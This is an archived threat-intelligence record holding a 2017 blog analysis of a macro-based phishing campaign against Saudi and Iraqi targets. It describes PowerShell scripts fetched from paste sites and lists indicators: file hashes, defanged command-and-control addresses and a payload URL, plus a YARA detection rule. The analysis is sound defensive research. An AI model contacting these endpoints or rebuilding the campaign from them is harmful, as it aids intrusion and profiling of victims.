{
	"id": "8e3ed199-17bc-435e-805c-fa73df4cc144",
	"created_at": "2026-04-06T00:11:24.286052Z",
	"updated_at": "2026-04-10T13:11:46.385069Z",
	"deleted_at": null,
	"sha1_hash": "20f15de94c959541b0e44e8e901aa23682b1b486",
	"title": "Continued Activity targeting the Middle East",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 359744,
	"plain_text": "Continued Activity targeting the Middle East\r\nBy Mo Bustami\r\nPublished: 2017-10-04 · Archived: 2026-04-05 15:04:55 UTC\r\nThis blog will discuss and uncover additional details regarding a recent campaign targeting entities in the Middle East.\r\nOn Tuesday September 26, 2017 MalwareBytes blogged about a phishing campaign targeting the Middle East, more\r\nspecifically Saudi Arabia.\r\nI started by trying to find the sample that the blog post analyzed and I was able to find it submitted to the great sandboxing\r\nsite of Hybrid Analysis (Big Shutout to @PayloadSecurity for the great service).\r\nThe file (b0a365d0648612dfc33d88183ff7b0f0) was named GSB[.]doc which is short for (Government Service Bus) or in\r\nArabic (الحكومية التكامل قناة (as seen below\r\nThe lure document perpetrating to be from GSB or تكامل\r\nLooking at the Macro code within the document, I was able to find that the code doesn't only try to get additional scripts\r\nfrom pastebin but also try to reach to filebin site as well to fetch the same file as shown below after doing some cleanup on\r\nthe code\r\nMoving on, I wanted to try and see if I can find additional samples based on the macro code that was embedded within this\r\nsample and I started by looking at the PowerShell file name which was mentioned in the MalwareBytes blog:\r\nNTSTATS[.]ps1\r\nDoing some quick research, I was able to find this Tweet from September 18, 2016 by @ReaQta which was discussing\r\nanother sample making use of the same PowerShell script however this time the code was trying to reach a Github instance\r\nto fetch the script. However, no mention of the lure sample. \r\nUsing the awesome feature within Hybrid Analysis that allows you to see if a certain sample was seen before, I was able to\r\nfind this (0873ddb4df8320b493a719bdddd7d182) this time the lure document had an Iraqi flavor to it with the content\r\nreferencing in Arabic the Iraqi National Intelligence System as shown below:\r\nhttps://sec0wn.blogspot.com/2017/10/continued-activity-targeting-middle-east.html\r\nPage 1 of 4\n\nFrom this, I wanted to see how deep the rabbit hole goes and what else is out there so I started looking at the PowerShell\r\n\"NTSTATS[.]ps1\" script more in depth and I was able to find similarities with another PowerShell \"Updater[.]ps1\" script\r\nthat was mentioned back in March of this year in an analysis done by Morphisec. As a matter of fact once you deobfuscate\r\nboth scripts they can look something like this\r\nNTSTAT vs Updater\r\nIt is worth mentioning that there are a lot of similarities between this campaign and the one described by Morphisec and\r\neven when it comes to C\u0026C communication and the use of Base64 encoded commands.\r\n I want to be clear though by saying that I am not trying to say that they are same actor, but they definitely have many\r\nsimilarities.\r\nAnalyzing the Macro code, the C\u0026C and scripts allowed me to find additional samples that I am including in the IoC section\r\nat the end. Most of these samples are available via multiple sources including VT, Hybrid Analysis, pastebin and Twitter and\r\nmost of them have themes focusing on the Middle East region.\r\nI also created a very simple YARA rule - included at the end of this blog - and I was able to collect additional and newer\r\nsamples like this one that was uploaded to VT today. The actors seems to have modified their Macro code and even their\r\nPowerShell Script as shown below\r\n I was able to find a reference of this script posted to Pastebin as early as September 23, 2017\r\nThey are also now using a modified Base64 encoded C\u0026C communication below and to a new IP 148.251.204[.]131:8060\r\nhxxp://148.251.204[.]131:8060/?\r\np=%7CT1y)*I9Sk9ITi1QQ35%5BdXNlcjF%5BfjMyLW)pdHw2LjEuNz%7CwMX$NaWNy@3NvZnQgV2luZG93cyA3IEVudGVycH)pc2UgfEM6XFdp@*R\r\nIn closing, I want to highlight that this campaign has been active since July based on samples that I came across on the\r\nplatforms I mentioned above and seem to be continuing as of the writing of this blog. Interestingly, with this one, there\r\nhasn't been a final payload dropped on the victim machines as of yet. The scripts as described by the blogs I referenced are\r\nmainly collecting information about the targets and profiling them.\r\nSome honorable mentions that I would like to highlight that in directly helped with this since they always post interesting\r\nstuff and I was able to use their posts to pivot to other samples\r\nIOCs:\r\nhttps://sec0wn.blogspot.com/2017/10/continued-activity-targeting-middle-east.html\r\nPage 2 of 4\n\nSHA-256 Hashes\r\nddae32a6234a58eb80837dcdea318cc6c16a3b067f74e305c0c647190b90be10\r\n58282917a024ac252966650361ac4cbbbed48a0df7cab7b9a6329d4a04551c0d\r\n97f9a83bc6bb1b3f5cb7ac9401f95265597bff796bb4901631d6fa2c79a48bdc\r\n81523e0199ae1dc9e87d2b952642785bfbda6326f22e4c0794a19afdf001a9a3\r\nffbe7df94929b03408791eb321a845fff9289c7be950aaec96267c79d5d26c5f\r\n58898648a68f0639c06bedc8242ca48bc6ec56f11ed40d00aa5fdda4e5553482\r\n96101de2386e35bc5e38d32524a02c6c5ca7cc6624e656a629b2e0f1693a76fd\r\n1b60b7f9b0faf25288f1057b154413921a6cb373dcee43e831b9263c5b3077ce\r\na3c1fd46177a078c4b95c744a24103df7d0a58cee1a3be92bc4cdd7dec1b1aa5\r\n76eb64994f9db257c4f7dbf406b542e3c9a7362f905b5ce4828aeb3db4743afa\r\n367021beedb3ad415c69c9a0e657dc3ed82b1b24a41a71537d889f5e2b7ca433\r\n2c8d18f03b6624fa38cae0141b91932ba9dc1221ec5cf7f841a2f7e31685e6a1\r\nc8b00765834342d3a9ef510f4b5bce91b7625de477b492f23c142d49f2f3bd50\r\n90b66b3fef77962fbfda364a4f8799bfcc9ab73772026d7a8922a7cf5556a024\r\n588cd0fe3ae6fbd2fa4cf8de8db8ae2069ea62c9eaa6854caedf45045780661f\r\n917a6c816684f22934e2998f43633179e14dcc2e609c6931dd2fc36098c48028\r\ne7c1e310868abbab4a141e1e40b19d641adeb68dda2f71a1bd55dabd77667bda\r\n5d049bd7f478ea5d978b3c78f7f0afdf294a94f526fc20ffd6e33022d40d15ae\r\n605fefc7829cfa41710e0b844084eab1f180fe513adc1d8f0f82501a154db0f4\r\nIP Addresses:\r\n144.76.109[.]88\r\n138.201.75.227\r\n148.251.204[.]131:8060\r\nURLs\r\nhttp://144.76.109[.]88/al/ag.txt\r\nKnown PowerShell File Names:\r\nNTSTATS.ps1\r\nal.ps1\r\nUpdater.ps1\r\nsystem.ps1\r\nYARA Rule\r\nrule ME_MalDoc\r\n{\r\nmeta:\r\nauthor = \"@MoBustami\"\r\ndate = \"2017-10-01\"\r\nstrings:\r\n$s0 = \"sdjNEqLClKPFAnuDvIyGTSgaMWRQYhrzXekcxifZ\"\r\nhttps://sec0wn.blogspot.com/2017/10/continued-activity-targeting-middle-east.html\r\nPage 3 of 4\n\ncondition:\r\n$s0\r\n}\r\nSource: https://sec0wn.blogspot.com/2017/10/continued-activity-targeting-middle-east.html\r\nhttps://sec0wn.blogspot.com/2017/10/continued-activity-targeting-middle-east.html\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://sec0wn.blogspot.com/2017/10/continued-activity-targeting-middle-east.html"
	],
	"report_names": [
		"continued-activity-targeting-middle-east.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434284,
	"ts_updated_at": 1775826706,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/20f15de94c959541b0e44e8e901aa23682b1b486.pdf",
		"text": "https://archive.orkl.eu/20f15de94c959541b0e44e8e901aa23682b1b486.txt",
		"img": "https://archive.orkl.eu/20f15de94c959541b0e44e8e901aa23682b1b486.jpg"
	}
}